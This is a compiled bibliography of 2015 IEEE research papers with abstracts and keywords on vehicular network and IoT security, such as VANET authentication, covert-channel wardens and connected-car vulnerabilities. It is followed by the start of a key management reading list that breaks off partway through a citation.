Keywords: Internet of Things; traffic engineering computing; vehicular ad hoc networks; Internet of Things; IoT; VANET based integrated framework; automotive technologies; smart accident management system; traffic management system; Accidents; Heuristic algorithms; Hospitals; Roads; Servers; Vehicles; Vehicular ad hoc networks; Body Area Networks (BAN);Internet of Things (IoT);VANET; accident detection; traffic management (ID#: 16-9234)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7292411&isnumber=7292366

 

Santa, J.; Fernandez, P.J.; Pereniguez, F.; Bernal, F.; Skarmeta, A.F., "A Vehicular Network Mobility Framework: Architecture, Deployment and Evaluation," in Computer Communications Workshops (INFOCOM WKSHPS), 2015 IEEE Conference on, pp. 127-132, April 26 2015-May 1 2015. doi: 10.1109/INFCOMW.2015.7179372

Abstract: Research on vehicular networks has increased for more than a decade, however, the maturity of involved technologies has been recently reached and standards/specifications in the area are being released these days. Although there are a number of protocols and network architecture proposals in the literature, above all in the Vehicular Ad-hoc Network (VANET) domain, most of them lack from realistic designs or present solutions far from being interoperable with the Future Internet. Following the ISO/ETSI guidelines in field of (vehicular) cooperative systems, this work addresses this problem by presenting a vehicular network architecture that integrates well-known Internet Engineering Task Force (IETF) technologies successfully employed in Internet. More precisely, this work describes how Internet Protocol version 6 (IPv6) technologies such as Network Mobility (NEMO), Multiple Care-of Address Registration (MCoA), IP Security (IPsec) or Internet Key Exchange (IKE), can be used to provide network access to in-vehicle devices. A noticeable contribution of this work is that it not only offers an architecture/design perspective, but also details a deployment viewpoint of the system and validates its operation under a real performance evaluation carried out in a Spanish highway. The results demonstrate the feasibility of the solution, while the developed testbed can serve as a reference in future vehicular network scenarios.

Keywords: IP networks; Internet; intelligent transportation systems; mobile computing; mobility management (mobile radio); protocols; telecommunication security; vehicular ad hoc networks; IETF technologies; IKE; IP security; IPsec; IPv6 technologies; ISO/ETSI; Internet Protocol version 6; Internet engineering task force technologies; Internet key exchange; MCoA; NEMO; Spanish highway; VANET; cooperative systems; future Internet; multiple care-of address registration; network architecture protocols; vehicular ad-hoc network; vehicular network mobility framework; Computer architecture; Internet; Roads; Security; Telecommunication standards; Vehicles; 802.11p; IPv6; Intelligent Transportation Systems;V2I;testbeds;vehicular networks (ID#: 16-9235)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7179372&isnumber=7179273

 

Axelrod, C.W., "Enforcing Security, Safety and Privacy for the Internet of Things," in Systems, Applications and Technology Conference (LISAT), 2015 IEEE Long Island, pp. 1-6, 1-1 May 2015. doi: 10.1109/LISAT.2015.7160214

Abstract: The connecting of physical units, such as thermostats, medical devices and self-driving vehicles, to the Internet is happening very quickly and will most likely continue to increase exponentially for some time to come. Valid concerns about security, safety and privacy do not appear to be hampering this rapid growth of the so-called Internet of Things (IoT). There have been many popular and technical publications by those in software engineering, cyber security and systems safety describing issues and proposing various “fixes.” In simple terms, they address the “why” and the “what” of IoT security, safety and privacy, but not the “how.” There are many cultural and economic reasons why security and privacy concerns are relegated to lower priorities. Also, when many systems are interconnected, the overall security, safety and privacy of the resulting systems of systems generally have not been fully considered and addressed. In order to arrive at an effective enforcement regime, we will examine the costs of implementing suitable security, safety and privacy and the economic consequences of failing to do so. We evaluated current business, professional and government structures and practices for achieving better IoT security, safety and privacy, and found them lacking. Consequently, we proposed a structure for ensuring that appropriate security, safety and privacy are built into systems from the outset. Within such a structure, enforcement can be achieved by incentives on one hand and penalties on the other. Determining the structures and rules necessary to optimize the mix of penalties and incentives is a major goal of this paper.

Keywords: Internet of Things; data privacy; security of data; Internet of Things; IoT privacy; IoT safety; IoT security; cyber security; software engineering; Government; Privacy; Safety; Security; Software; Standards; Internet of Things (IoT); privacy; safety; security; software liability; system development lifecycle (SDLC);time to value; value hills; vulnerability marketplace (ID#: 16-9236)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160214&isnumber=7160171

 

Razzaque, M.A.; Clarke, S., "A Security-Aware Safety Management Framework for IoT-Integrated Bikes," in Internet of Things (WF-IoT), 2015 IEEE 2nd World Forum on, pp. 92-97, 14-16 Dec. 2015. doi: 10.1109/WF-IoT.2015.7389033

Abstract: Bike and vehicle collisions often result in fatality to vulnerable bikers. Use of technologies can protect such vulnerable road users. Next generation smart bikes with sensing, computing and communication capabilities or bikes with bikers' smartphones have the potential to be integrated in an Internet of Things (IoT) environment. Unlike avoidance of inter-vehicle collisions, very limited efforts are made on IoT-integrated bikes and vehicles to avoid bike-vehicle collisions and offer bikers' safety. Moreover, these IoT-integrated bikes and vehicles will create new and different information and cyber security risks that could make existing safety solutions ineffective. To exploit the potential of IoT in an effective way, especially in bikers' safety, this work proposes a security-aware bikers' safety management framework that integrates a misbehavior detection scheme (MDS) and a collision prediction and detection scheme (CPD). The MDS, in particular for vehicles (as vehicles are mainly responsible for most bike-vehicle collisions) provides security-awareness to the framework using in-vehicle security checking and vehicles' mobility-patterns-based misbehavior detection. The MDS also includes in-vehicle driver's behavior monitoring to identify potential misbehaving drivers. The framework's MDS and the CPD relies on the improved versions of some existing solutions. Use cases of the framework demonstrates its potential in providing bikers safety.

Keywords: Internet of Things; bicycles; mobility management (mobile radio); road safety; smart phones; telecommunication security; CPD scheme; Internet of Things environment; IoT environment; IoT-integrated bikes; MDS; behavior monitoring; bike collisions; bike-vehicle collisions; collision prediction and detection scheme; cyber security risks; in-vehicle security checking; information risks; mobility-patterns-based misbehavior detection; next generation smart bikes; security-aware bikers safety management framework; security-awareness; smartphones; vulnerable road users; Cloud computing; Estimation; Roads; Security; Trajectory; Vehicles; Bikers' Safety; Bikes; Collision Prediction and Detection;Security;V2X communication (ID#: 16-9237)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7389033&isnumber=7389012

 

Gantsou, D., "On the Use of Security Analytics for Attack Detection in Vehicular Ad Hoc Networks," in Cyber Security of Smart Cities, Industrial Control System and Communications (SSIC), 2015 International Conference on, pp. 1-6, 5-7 Aug. 2015. doi: 10.1109/SSIC.2015.7245674

Abstract: A vehicular ad hoc network (VANET) is a special kind of mobile ad hoc network built on top of the IEEE802.11p standard for a better adaptability to the wireless mobile environment. As it is used for both supporting vehicle-to-vehicle (V2V) as well as vehicle-to-infrastructure (V2I) communications, and connecting vehicles to external resources including cloud services, Internet, and user devices while improving the road traffic conditions, VANET is a Key component of intelligent transportation systems (ITS). As such, VANET can be exposed to cyber attacks related to the wireless environment, and those of traditional information technologies systems it is connected to. However, when looking at solutions that have been proposed to address VANET security issues, it emerges that guaranteeing security in VANET essentially amounts to resorting to cryptographic-centric mechanisms. Although the use of public key Infrastructure (PKI) fulfills most VANET' security requirements related to physical properties of the wireless transmissions, simply relying on cryptography does not secure a network. This is the case for vulnerabilities at layers above the MAC layer. Because of their capability to bypass security policy control, they can still expose VANET, and thus, the ITS to cyber attacks. Thereby, one needs security solutions that go beyond cryptographic mechanisms in order cover multiple threat vectors faced by VANET. In this paper focusing on attack detection, we show how using an implementation combining observation of events and incidents from multiple sources at different layers Sybil nodes can be detected regardless of the VANET architecture.

Keywords: intelligent transportation systems; telecommunication security; vehicular ad hoc networks;IEEE802.11p standard; VANET; attack detection; cryptographic-centric mechanisms; cyber attacks; intelligent transportation systems; mobile ad hoc network; security analytics; vehicular ad hoc networks; wireless mobile environment; Communication system security; Cryptography; IP networks; Vehicles; Vehicular ad hoc networks; Intelligent Transportation Systems (ITS); Vehicular ad hoc network (VANET) security; attack detection (ID#: 16-9238)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7245674&isnumber=7245317

 

Sadeghi, A.-R.; Wachsmann, C.; Waidner, M., "Security and Privacy Challenges in Industrial Internet of Things," in Design Automation Conference (DAC), 2015 52nd ACM/EDAC/IEEE, pp. 1-6, 8-12 June 2015. doi: 10.1145/2744769.2747942.

Abstract: Today, embedded, mobile, and cyberphysical systems are ubiquitous and used in many applications, from industrial control systems, modern vehicles, to critical infrastructure. Current trends and initiatives, such as “Industrie 4.0” and Internet of Things (IoT), promise innovative business models and novel user experiences through strong connectivity and effective use of next generation of embedded devices. These systems generate, process, and exchange vast amounts of security-critical and privacy-sensitive data, which makes them attractive targets of attacks. Cyberattacks on IoT systems are very critical since they may cause physical damage and even threaten human lives. The complexity of these systems and the potential impact of cyberattacks bring upon new threats. This paper gives an introduction to Industrial IoT systems, the related security and privacy challenges, and an outlook on possible solutions towards a holistic security framework for Industrial IoT systems.

Keywords: Internet of Things; data privacy; embedded systems; industrial control; mobile computing; security of data; Industrie 4.0;business models; cyberattacks; cyberphysical system; embedded system; industrial Internet of Things; industrial IoT systems; industrial control systems; mobile system; privacy-sensitive data; security-critical data; user experiences; Computer architecture; Privacy; Production facilities; Production systems; Security; Software (ID#: 16-9239)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7167238&isnumber=7167177

 

Aggarwal, M.; Katal, A.; Prabhakar, R., "Bus Locator: Application for Time Management and Security," in Advances in Computing and Communication Engineering (ICACCE), 2015 Second International Conference on, pp. 519-523, 1-2 May 2015. doi: 10.1109/ICACCE.2015.134

Abstract: Due to increase in crime like abduction, persistent attacks, etc., the personal security and safety of passengers is becoming more and more important to the family, organizations and government. This has been noticed that maximum abductions are occurring at the bus stops where the passengers are waiting for their respective vehicles. The mismatch in the schedule of the vehicles and the passengers gives an edge to the culprits to commit the crime. In this paper we have discussed the troubles that are faced by passengers waiting for vehicles because of the mismatch in the timing which leads to poor time management and increase in security attacks. In order to solve this problem we have proposed a solution in which we have developed an android based application that helps the passengers to keep themselves updated about the current location of the vehicle. This approach is different as we have implemented it by sending the information through text messages with no internet connectivity and no android phone. Passengers waiting at their respective stops will be able to know where the vehicle has reached. This will help them to manage their time and ensure their security and safety.

Keywords: law; safety; security; time management; traffic engineering computing; bus locator; crime; passengers safety; personal security; security attacks; time management; Layout; Mobile communication; Security; Smart phones; Vehicles; Android Bus Locator; location Listener; Main Activity; SmsManager; Start Service; Stop Service Algorithms (ID#: 16-9240)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7306740&isnumber=7306547

 

Becsi, T.; Aradi, S.; Gaspar, P., "Security Issues and Vulnerabilities in Connected Car Systems," in Models and Technologies for Intelligent Transportation Systems (MT-ITS), 2015 International Conference on, pp. 477-482, 3-5 June 2015. doi: 10.1109/MTITS.2015.7223297

Abstract: The Connected Revolution has reached the automotive industry and the Internet penetrates into the modern vehicles. Formerly acquiring data from a vehicle was the tool of Fleet Management Systems handling commercial vehicles. In the recent years connectivity began to appear in the passenger vehicles also. The first features were infotainment and navigation, having low security needs remaining far from the vehicular networks. Then telematics and remote control, such as keyless entry appeared and created a new security threat in the vehicle. The paper shows how the connected feature changes the vehicle and also presents vulnerabilities of each element to show the importance of cautious system security design.

Keywords: automobiles; intelligent transportation systems; security of data; vehicular ad hoc networks; Internet; automotive industry; connected car systems; connected revolution; fleet management systems; infotainment; keyless entry; navigation; passenger vehicles; remote control; security issues; security threat; security vulnerabilities; system security design; telematics; vehicular networks; Internet; Logic gates; Mobile communication; Mobile handsets; Security; Vehicles; Wireless communication; Connected Car; Security (ID#: 16-9241)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7223297&isnumber=7223230

 

Zhuo Bi; Deji Chen; Cheng Wang; Changjun Jiang; Ming Chen, "Adopting WirelessHART for In-vehicle-Networking," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1027-1030, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.244

Abstract: It is estimated that the breakthrough in the broad deployment of Internet of Things (IoT) could come from smart cars. Indeed, we have seen multi-facet advances around cars: new material, in vehicle infotainment, driverless cars, smart transportation, electrical vehicles, etc. However, in-vehicle-networking has been mainly by wire, the wiring for a car is largely pre-built during the design phase. With more and more things networked within a car, wiring has taken up 1-2 percent of the total weight. This translates into burning up to 0.1 kilogram fuel over 100 kilometers. On the other hand, the advances in wireless technology, especially the broad acceptance of WirelssHART in the industrial settings, has proved its capability in harsh environments. This paper studies what could happen if we use WirelessHART mesh network for in-vehicle communication. While new wireless network protocols are needed to perform the task of CAN, the dominant in-vehicle fieldbus, WirelessHART could take on the work performed by LIN, the fieldbus for peripheral devices. A detailed study is provided to compare these buses. Road tests were performed, in which a WirelessHART network keeps running for the whole 20 minute period.

Keywords: Internet of Things; controller area networks; field buses; on-board communications; wireless mesh networks; CAN; Internet of Things; IoT; LIN; WirelessHART mesh network; driverless car; electrical vehicle; in-vehicle fieldbus; in-vehicle networking; smart car; vehicle infotainment; Communication system security; Protocols; Standards; Vehicles; Wireless communication; Wireless sensor networks; Wires; CAN; LIN; Reliable Wireless Sensor Network; Smart Car; WirelessHART (ID#: 16-9242)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336304&isnumber=7336120

 

Ahmed, K.J.; Lee, M.J.; Jie Li, "Layered Scalable WAVE Security for VANET," in Military Communications Conference, MILCOM 2015 - 2015 IEEE, pp. 1566-1571, 26-28 Oct. 2015. doi: 10.1109/MILCOM.2015.7357668

Abstract: We are proposing a layered and scalable WAVE (Wireless Access for Vehicular Environments) security structure for VANET (Vehicular Ad hoc Network) network. The scalability and variable message delivery are provided by using both asymmetric and symmetric encryption algorithm. The whole region is divided into different security domains and the security related load of each domain is distributed evenly. At the top Regional Transportation Authority (RTA) generates keys and store information of Master and Edge RSU (MRSU/ERSU), which in turn store the keys and information of RSU. MRSU/ERSU also provide the pseudonym seeds and store information of vehicles. RSU is used only as access point for contacting transportation authority or access internet. High priority emergency message delivery is expedited by using symmetric key cryptography. Besides, the simulation comparison shows that our scheme also provide significantly improved network throughput without compromising security goals.

Keywords: Internet; public key cryptography; telecommunication security; vehicular ad hoc networks; ERSU; Internet; MRSU; RTA; Regional Transportation Authority; VANET network; access point; asymmetric encryption algorithm; edge RSU; information storage; key generation; layered scalable WAVE security structure; master RSU; network throughput improvement; pseudonym seeds; scalability message delivery; security related load; symmetric encryption algorithm; symmetric key cryptography; variable message delivery; vehicular ad hoc network; wireless access for vehicular environments; Privacy; Protocols; Public key; Scalability; Vehicles; Vehicular ad hoc networks; Mobile ad hoc network; Security; VANET; privacy; trust (ID#: 16-9243)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7357668&isnumber=7357245

 

Sharma, M.K.; Kaur, A., "A Survey on Vehicular Cloud Computing and its Security," in Next Generation Computing Technologies (NGCT), 2015 1st International Conference on, pp. 67-71, 4-5 Sept. 2015. doi: 10.1109/NGCT.2015.7375084

Abstract: Vehicular networking has a significant advantages in the today era. It provides desirable features and some specific applications such as efficient traffic management, road safety and infotainment. The vehicle consists of comparatively more communication systems such as on-board computing device, storage and computing power, GPS etc. to provide Intelligent Transportation System (ITS). The new hybrid technology known as Vehicular Cloud Computing (VCC) has great impact on the ITS by using the resources of vehicles such as GPS, storage, internet and computing power for instant decision making and sharing information on the cloud. Moreover, the paper not only present the concept of vehicular cloud but also provide a brief overview on the applications, security issues, threats and security solution for the VCC.

Keywords: cloud computing; decision making; intelligent transportation systems; security of data; vehicular ad hoc networks; ITS; VCC; communication systems; computing power; information sharing; instant decision making; intelligent transportation system; on-board computing device; road safety; security issues; traffic management; vehicular cloud computing; vehicular networking; Cloud computing; Global Positioning System; Roads; Security; Sensors; Vehicles; Intelligent Transportation System; Vehicular Ad hoc Networks; Vehicular Cloud; Vehicular Cloud Computing; Vehicular Cloud Security (ID#: 16-9244)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7375084&isnumber=7375067

 

Mundhenk, P.; Steinhorst, S.; Lukasiewycz, M.; Fahmy, S.A.; Chakraborty, S., "Lightweight Authentication for Secure Automotive Networks," in Design, Automation & Test in Europe Conference & Exhibition (DATE), 2015, pp. 285-288, 9-13 March 2015. Doi:  (not provided)

Abstract: We propose a framework to bridge the gap between secure authentication in automotive networks and on the internet. Our proposed framework allows runtime key exchanges with minimal overhead for resource-constrained in-vehicle networks. It combines symmetric and asymmetric cryptography to establish secure communication and enable secure updates of keys and software throughout the lifetime of the vehicle. For this purpose, we tailor authentication protocols for devices and authorization protocols for streams to the automotive domain. As a result, our framework natively supports multicast and broadcast communication. We show that our lightweight framework is able to initiate secure message streams fast enough to meet the real-time requirements of automotive networks.

Keywords: Internet; authorisation; automobiles; computer network security; cryptographic protocols; Internet; asymmetric cryptography; authentication protocols; authorization protocols; broadcast communication; lightweight authentication; multicast communication; resource-constrained in-vehicle networks; runtime key exchanges; secure authentication; secure automotive networks; secure message streams; Authentication; Authorization; Automotive engineering; Encryption; Vehicles (ID#: 16-9245)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7092398&isnumber=7092347

 

Singla, A.; Mudgerikar, A.; Papapanagiotou, I.; Yavuz, A.A., "HAA: Hardware-Accelerated Authentication for Internet of Things in Mission Critical Vehicular Networks," in Military Communications Conference, MILCOM 2015 - 2015 IEEE, pp. 1298-1304, 26-28 Oct. 2015. doi: 10.1109/MILCOM.2015.7357624

Abstract: Modern vehicles are being equipped with advanced sensing and communication technologies, which enable them to connect to surrounding entities. In military vehicular networks, it is vital to prevent adversaries from manipulating critical messages via cryptographic protection (e.g., digital signatures) and at the same time to minimize the impact introduced by crypto operations (e.g., delay). Hence, their communication must be delay-aware, scalable and secure. In this paper, we developed Hardware-Accelerated Authentication (HAA) that enables practical realization of delay-aware signatures for vehicular networks. Specifically, we developed a cryptographic hardware-acceleration framework for Rapid Authentication (RA) [1], which is a delay-aware offline-online signature scheme for command and control systems. We showed that HAA can significantly improve the performance of offline-online constructions under high message throughput, which is an important property for vehicular networks. HAA-2048 (GPU) is ×18, ×6, and ×3 times faster than the current CPU implementation of RSA, ECDSA and RA, respectively, for the same level of security.

Keywords: Internet of Things; message authentication; microprocessor chips; military communication; military computing; public key cryptography; vehicular ad hoc networks; CPU implementation; ECDSA; GPU; HAA; HAA-2048;Internet of Things; RA; RSA; advanced sensing and communication technologies; command and control system; critical message manipulation; crypto operation; cryptographic hardware-acceleration framework; cryptographic protection; delay-aware offline-online signature scheme; hardware-accelerated authentication; high message throughput; military vehicular network; mission critical vehicular network; rapid authentication; Acceleration; Authentication; Cryptography; Delays; Graphics processing units; Throughput; Authentication; digital signatures; hardware-acceleration; vehicular networks (ID#: 16-9246)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7357624&isnumber=7357245

 

Singh, A.; Gupta, R.; Rastogi, R., "A Novel Approach for Vehicle Tracking System for Traffic Jam Problem," in Computing for Sustainable Global Development (INDIACom), 2015 2nd International Conference on, pp. 169-174, 11-13 March 2015. Doi:  (not provided)

Abstract: This research paper focuses on the sensitive issue of traffic jams on roads, which often lead to some problems like- missing of an important meeting or appointment, missing of scheduled trains, getting late for schools/college etc. or sometimes a conflict amongst people. However this paper tries to sort this problem by tracking the root cause of it i.e. “the movement of vehicles on roads” and hereby predicting their further path to be traced with the help of an essentially used tool “GPS”. This can also be proved helpful in avoiding crimes like kidnappings and can also be proved helpful for a girl's security keeping in mind the present scenario of society where heinous crimes like Damini rape case takes place. We are living in twenty first century, the century where we are planning to achieve more and more preciseness, faster computations and increased luxuries. With the coming time, the number of cars on road are of course going to increase, which is more prone to traffic jam problems, hereby blurring our future view of making a more faster and precise world. This paper deals with the present scenario and a practical approach to minimise it. Further this could also has many advantages beside this like- security of girls(keeping in mind the present scenario of society) and easy access of means of transport for waiting passengers.

Keywords: road traffic; road vehicles ;tracking; traffic engineering computing; GPS; traffic jam problem; vehicle tracking system; Global Positioning System; Internet; Microcontrollers; Roads; Security; Servers; Vehicles; GPS; Traffic jam; google maps; tracking of vehicles (ID#: 16-9247)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7100240&isnumber=7100186

 

Mayer, S.; Siegel, J., "Conversations with Connected Vehicles," in Internet of Things (IOT), 2015 5th International Conference on the, pp. 38-44, 26-28 Oct. 2015. doi: 10.1109/IOT.2015.7356546

Abstract: We present a system that allows drivers and fleet managers to interact with their connected vehicles both by means of direct control and indirect goal-setting. The ability to move data from vehicles to a remote server is established by the flexible and secure open vehicle telematics platform “CloudThink.” Based on this platform, we present several prototypes of how people can be enabled to conveniently interact with connected vehicles: First, we demonstrate a system that allows users to select and interact with vehicles using object recognition methods and automatically generated user interfaces on smartphones or personal wearable devices. Second, we show how functional semantic metadata can be used to smooth the boundaries for interacting with vehicles in the physical and virtual worlds. Finally, we present a method for monitoring interactions between vehicles and remote services which increases safety and security by enhancing driver oversight and control over the data that leaves and enters their vehicle.

Keywords: cloud computing; meta data; mobile computing; object recognition; radiotelemetry; semantic Web; smart phones; telecommunication security; user interfaces; vehicular ad hoc networks; CloudThink; functional semantic metadata; object recognition method; personal wearable device; remote server; remote service; smartphone; telematics platform; user interface; Automobiles; Cloud computing; Connected vehicles; Hardware; Logic gates; Servers (ID#: 16-9248)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7356546&isnumber=7356538

 

Yang Yang; Vlajic, N.; Nguyen, U.T., "Next Generation of Impersonator Bots: Mimicking Human Browsing on Previously Unvisited Sites," in Cyber Security and Cloud Computing (CSCloud), 2015 IEEE 2nd International Conference on, pp. 356-361, 3-5 Nov. 2015. doi: 10.1109/CSCloud.2015.93

Abstract: The development of Web bots capable of exhibiting human-like browsing behavior has long been the goal of practitioners on both side of security spectrum - malicious hackers as well as security defenders. For malicious hackers such bots are an effective vehicle for bypassing various layers of system/network protection or for obstructing the operation of Intrusion Detection Systems (IDSs). For security defenders, the use of human-like behaving bots is shown to be of great importance in the process of system/network provisioning and testing. In the past, there have been many attempts at developing accurate models of human-like browsing behavior. However, most of these attempts/models suffer from one of following drawbacks: they either require that some previous history of actual human browsing on the target web-site be available (which often is not the case), or, they assume that 'think times' and 'page popularities' follow the well-known Poisson and Zipf distribution (an old hypothesis that does not hold well in the modern-day WWW). To our knowledge, our work is the first attempt at developing a model of human-like browsing behavior that requires no prior knowledge or assumption about human behavior on the target site. The model is founded on a more general theory that defines human behavior as an 'interest-driven' process. The preliminary simulation results are very encouraging - web bots built using our model are capable of mimicking real human browsing behavior 1000-fold better compared to bots that deploy random crawling strategy.

Keywords: Internet; Poisson distribution; Web sites; computer crime; invasive software; IDS; Poisson distribution; Web bots; Web-site; Zipf distribution; human behavior; human browsing behavior; human-like behaving bots; human-like browsing behavior; impersonator bot; intrusion detection system; network protection; next generation; random crawling strategy; security defender; security spectrum-malicious hacker; system protection; unvisited site; Computer hacking; History; Internet; Predictive models; Web pages; bot modeling; interest-driven human browsing (ID#: 16-9249)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371507&isnumber=7371418

 

Mejri, M.N.; Hamdi, M., "Recent Advances in Cryptographic Solutions for Vehicular Networks," in Networks, Computers and Communications (ISNCC), 2015 International Symposium on, pp. 1-7, 13-15 May 2015. doi: 10.1109/ISNCC.2015.7238573

Abstract: As vehicles become increasingly intelligent, it is expected that in the near future they will be equipped with radio interfaces. This will enable the formation of vehicular networks, commonly referred to as VANETs, an instance of mobile ad hoc networks with cars as the mobile nodes. As VANETs exhibit several unique features (e.g. high mobility of nodes, geographic extension) traditional security mechanisms are not always applicable. Consequently, a plethora of research contributions have been presented to cope with the intrinsic characteristics of vehicular communication. This paper outlines the communication architecture of VANETs and discusses the security and privacy challenges that need to be overcome to make such networks practically viable. It compares the various cryptographic schemes that were suggested for VANETs and explores some future trends that will shape the research in cryptographic protocols for intelligent transportation systems.

Keywords: cryptographic protocols; intelligent transportation systems; vehicular ad hoc networks; VANET; communication architecture; cryptographic protocols; intelligent transportation systems; intrinsic characteristics; mobile ad hoc networks; privacy challenges; radio interfaces; security challenges; vehicular ad hoc networks; Authentication; Cryptography; Internet; Vehicles; Vehicular ad hoc networks; Wireless communication; Attacks; Cryptographic algorithms; IEEE 802.11p; Security requirements; Vehicular Ad hoc Networks (VANETs) (ID#: 16-9250)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7238573&isnumber=7238567

 

Dakhane, D.M.; Deshmukh, P.R., "Active Warden for TCP Sequence Number Base Covert Channel," in Pervasive Computing (ICPC), 2015 International Conference on, pp. 1-5, 8-10 Jan. 2015. doi: 10.1109/PERVASIVE.2015.7087183

Abstract: Network covert channel generally use for leak the information by violating the security policies. It allows the attacker to send as well as receive secret information without being detected by the network administrator or warden in the network. There are several ways to implement such covert channels; Storage covert channel and Timing covert channel. However there is always some possibility of these covert channels being identified depending on their behaviour. In this paper, we propose, an active warden, which normalizes incoming and outgoing network traffic for eliminating all possible storage based covert channels. It is specially design for TCP sequence number because this field is a maximum capacity vehicle for storage based covert channel. Our experimental result shows that propose active warden model eliminates covert communication up to 99%, while overt communication is as intact.

Keywords: transport protocols; TCP sequence number base covert channel; maximum capacity vehicle; security policies; storage covert channel; timing covert channel; IP networks; Internet; Kernel; Protocols; Security; Telecommunication traffic; Timing; Active Warden; Network Covert Channels; Storage Covert Channels; TCP Headers; TCP ISN;TCP Sequence Number; TCP-SQN; TCP/IP} (ID#: 16-9251)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7087183&isnumber=7086957

 

Sharma, M.K.; Bali, R.S.; Kaur, A., "Dyanimc Key Based Authentication Scheme for Vehicular Cloud Computing," in Green Computing and Internet of Things (ICGCIoT), 2015 International Conference on, pp. 1059-1064, 8-10 Oct. 2015. doi: 10.1109/ICGCIoT.2015.7380620

Abstract: In recent years, Vehicular Cloud Computing (VCC) has emerged as new technology to provide uninterrupted information to the vehicles from anywhere, anytime. The VCC provides two types of services such as safety related messages and non-safety related messages to the users. The vehicles have less computational power, storage etc. so that the vehicles collect information and send these information to the local or vehicular cloud for computation or storage purposes. But due to the dynamic nature, rapid topology changes and open communication medium, the information can be altered so that it leads to misguiding users, wrong information sharing etc. In the proposed scheme, Elliptic Curve Cryptography used for secure communication in the network that also ensures the security requirements such as confidentiality, integrity, privacy etc. The proposed scheme ensures the mutual authentication of both sender and receiver that wants to communicate. The scheme uses additional operation such as one-way hash function and concatenation to secure the network against various attacks i.e. spoofing attack, man-in-the-middle attack, replay attack etc. The effectiveness of the proposed scheme is evaluated using the different metrics such as packet delivery ratio, throughput and end-to-end delay and it is found better where it is not applied.

Keywords: automobiles; cloud computing; intelligent transportation systems; public key cryptography; vehicular ad hoc networks; VCC; dynamic key-based authentication scheme; elliptic curve cryptography; mutual authentication; open communication medium; vehicular cloud computing; Authentication; Cloud computing; Elliptic curve cryptography; Elliptic curves; Receivers; Vehicles; Intelligent Transportation System; Key Authentication; Key Generation; VANET's; Vehicular Cloud Computing (ID#: 16-9252)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7380620&isnumber=7380415


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

Key Management 2015

 

 
SoS Logo

Key Management 2015

 

Successful key management is critical to the security of any cryptosystem. It is perhaps the most difficult part of cryptography including as it does system policy, user training, organizational and departmental interactions, and coordination between all of these elements and includes dealing with the generation, exchange, storage, use, and replacement of keys, key servers, cryptographic protocols, and user procedures. For researchers, key management is a challenge to create larger scale and faster systems to operate within the cloud and other complex environments, while ensuring validity and not adding weight to the process.  For the Science of Security community, it is relevant to scalability, resilience, metrics, and human behavior.  The work cited here was presented in 2015.


Sharma, S.; Krishna, C.R., "An Efficient Distributed Group Key Management Using Hierarchical Approach with Elliptic Curve Cryptography," in Computational Intelligence & Communication Technology (CICT), 2015 IEEE International Conference on, pp. 687-693, 13-14 Feb. 2015. doi: 10.1109/CICT.2015.116

Abstract: Secure and reliable group communication is an active area of research. Its popularity is fueled by the growing importance of group-oriented and collaborative properties. The central research challenge is secure and efficient group key management. In this paper, we propose an efficient many-to-many group key management protocol in distributed group communication. This protocol is based on Elliptic Curve Cryptography and decrease the key length while providing securities at the same level as that of other cryptosystems provides. The main issue in secure group communication is group dynamics and key management. A scalable secure group communication model ensures that whenever there is a membership change, a new group key is computed and distributed to the group members with minimal communication and computation cost. This paper explores the use of batching of group membership changes to reduce the time and key re-distribution operations. The features of ECC protocol are that, no keys are exchanged between existing members at join, and only one key, the group key, is delivered to remaining members at leave. In the security analysis, our proposed algorithm takes less time when users join or leave the group in comparison to existing one. In ECC, there is only 1 key generation and key encryption overhead at join and leave operation. At join the communication overhead is key size of a node and at leave operation is 2 log2 n -- 2 × key size of a node.

Keywords: cryptographic protocols; public key cryptography; ECC protocol; collaborative properties; cryptosystems; distributed group communication; distributed group key management; elliptic curve cryptography; group dynamics; group membership; group-oriented properties; hierarchical approach; key encryption overhead; key redistribution operations; many-to-many group key management protocol; scalable secure group communication model; security analysis; Binary codes; Elliptic curve cryptography; Encryption; Protocols; Distributed Group Key Management; Group Communication; Hierarchical Group Key Management (ID#: 16-9354)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7078791&isnumber=7078645

 

Benmalek, M.; Challal, Y., "eSKAMI: Efficient and Scalable Multi-group Key Management for Advanced Metering Infrastructure in Smart Grid," in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, pp. 782-789, 20-22 Aug. 2015. doi: 10.1109/Trustcom.2015.447

